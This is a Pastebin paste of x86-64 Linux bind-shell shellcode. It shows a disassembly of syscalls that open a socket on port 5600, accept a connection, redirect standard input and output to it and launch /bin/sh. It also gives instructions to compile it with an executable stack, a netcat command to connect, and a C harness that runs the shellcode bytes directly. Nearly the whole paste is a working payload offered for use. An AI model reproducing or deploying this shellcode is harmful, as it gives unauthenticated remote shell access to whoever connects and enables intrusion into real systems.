API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 15th, 2017
110
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. /*
  4.  
  5. Disassembly of section .text:
  6.  
  7. 0000000000400080 <.text>:
  8. 400080: 48 31 c0 xor %rax,%rax
  9. 400083: 48 31 d2 xor %rdx,%rdx
  10. 400086: 48 31 f6 xor %rsi,%rsi
  11. 400089: ff c6 inc %esi
  12. 40008b: 6a 29 pushq $0x29
  13. 40008d: 58 pop %rax
  14. 40008e: 6a 02 pushq $0x2
  15. 400090: 5f pop %rdi
  16. 400091: 0f 05 syscall
  17. 400093: 48 97 xchg %rax,%rdi
  18. 400095: 6a 02 pushq $0x2
  19. 400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
  20. 40009e: 54 push %rsp
  21. 40009f: 5e pop %rsi
  22. 4000a0: 52 push %rdx
  23. 4000a1: 6a 31 pushq $0x31
  24. 4000a3: 58 pop %rax
  25. 4000a4: 6a 10 pushq $0x10
  26. 4000a6: 5a pop %rdx
  27. 4000a7: 0f 05 syscall
  28. 4000a9: 5e pop %rsi
  29. 4000aa: 6a 32 pushq $0x32
  30. 4000ac: 58 pop %rax
  31. 4000ad: 0f 05 syscall
  32. 4000af: 6a 2b pushq $0x2b
  33. 4000b1: 58 pop %rax
  34. 4000b2: 0f 05 syscall
  35. 4000b4: 48 97 xchg %rax,%rdi
  36. 4000b6: 6a 03 pushq $0x3
  37. 4000b8: 5e pop %rsi
  38. 4000b9: ff ce dec %esi
  39. 4000bb: b0 21 mov $0x21,%al
  40. 4000bd: 0f 05 syscall
  41. 4000bf: 75 f8 jne 0x4000b9
  42. 4000c1: f7 e6 mul %esi
  43. 4000c3: 52 push %rdx
  44. 4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
  45. 4000cb: 2f 73 68
  46. 4000ce: 53 push %rbx
  47. 4000cf: 48 8d 3c 24 lea (%rsp),%rdi
  48. 4000d3: b0 3b mov $0x3b,%al
  49. 4000d5: 0f 05 syscall
  50.  
  51. ---------------------------------------------------------------------------------------------------
  52.  
  53. How To Run
  54.  
  55. $ gcc -o bind_shell bind_shell.c
  56. $ execstack -s bind_shell
  57. $ ./bind_shell
  58.  
  59. How to Connect
  60.  
  61. $ nc <HOST IP ADDRESS> 5600
  62.  
  63. Eg:
  64.  
  65. $ nc 127.0.0.1 5600
  66.  
  67. ---------------------------------------------------------------------------------------------------
  68. */
  69. #include <stdio.h>
  70. char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
  71. void main(int argc, char **argv)
  72. {
  73. int (*func)();
  74. func = (int (*)()) sh;
  75. (int)(*func)();
  76. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!